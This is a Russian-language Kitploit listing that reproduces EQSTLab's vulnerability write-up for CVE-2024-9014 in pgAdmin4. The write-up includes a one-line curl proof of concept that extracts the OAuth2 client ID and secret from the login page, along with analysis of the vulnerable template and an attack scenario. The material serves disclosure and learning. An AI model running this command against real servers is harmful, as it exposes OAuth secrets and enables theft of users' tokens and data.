Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-9014 — Pgadmin4 Sensitive Information Exposure | Kitploit
Инструменты/GitHubGitHub/eqstlab/cve-2024-9014
Vulnerability AnalysisExploitationInformation GatheringWeb SecurityPenetration TestingLearning & Education
GitHubeqstlab/cve-2024-9014

CVE-2024-9014

Pgadmin4 Sensitive Information Exposure

Репозиторий
811 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Этот пост — исследовательская статья, опубликованная EQSTLab.

CVE-2024-9014

★ CVE-2024-9014 Уязвимость раскрытия конфиденциальной информации PoC ★

Description

CVE-2024-9014 : pgAdmin4 Уязвимость раскрытия конфиденциальной информации

Описание: версии pgAdmin 8.11 и более ранние уязвимы к ошибке безопасности в аутентификации OAuth2. Эта уязвимость позволяет злоумышленнику потенциально получить идентификатор клиента и секрет, что приводит к несанкционированному доступу к данным пользователя.

PoC

Command

root@kitploit:~
curl [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'

Example

root@kitploit:~
curl http://localhost:8000/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'

Output

pgadmin4-8.9 и pgadmin4-8.12 alt text

Analysis

Уязвимое место (pgadmin/templates/security/login_user.html)

В этом месте переменная config.OAUTH2_CONFIG возвращает файлы конфигурации OAuth2, включая OAUTH2_CLIENT_ID и OAUTH2_CLIENT_SECRET.

root@kitploit:~
{% set page_name = 'login_user' %}
{% set user_language = request.cookies.get('PGADMIN_LANGUAGE') or 'en' %}
{% set ns = namespace(langOptions=[]) %}
{% for key, lang in config.LANGUAGES.items() %}
{% set _ = ns.langOptions.append({'value': key, 'label': lang}) %}
{% endfor %}
{% set page_props = {
    'userLanguage': user_language,
    'langOptions': ns.langOptions,
    'forgotPassUrl': url_for('browser.forgot_password'),
    'loginUrl': url_for('authenticate.login'),
    'csrfToken': csrf_token(),
    'authSources': config.AUTHENTICATION_SOURCES,
    'authSourcesEnum': {
        'OAUTH2': config.OAUTH2,
        'KERBEROS': config.KERBEROS,
    },
    'oauth2Config': config.OAUTH2_CONFIG,
    'loginBanner': config.LOGIN_BANNER|safe
} %}
{% extends "security/render_page.html" %}


Patch

alt text

Scenario

Компрометация личной информации

Идентификация и защита секретных параметров OAuth очень важны. Хотя “client_id” можно безопасно раскрыть, раскрытие “client_secret” несет значительный риск. Если client_secret скомпрометирован, злоумышленник может использовать идентичность и доверие приложения для кражи “access token” пользователя и личной информации.

Disclaimer

Этот репозиторий не предназначен для раскрытия конфиденциальной информации, связанной с CVE-2024-9014. Цель этого проекта — помочь людям узнать об этой уязвимости и, возможно, протестировать свои собственные приложения.

EQST Insight

Мы публикуем анализ CVE и вредоносного ПО раз в месяц. Если вам интересно, перейдите по ссылкам ниже, чтобы ознакомиться с нашими публикациями. https://www.skshieldus.com/eng/business/insight.do

Reference

https://nvd.nist.gov/vuln/detail/CVE-2024-9014

Скачать инструмент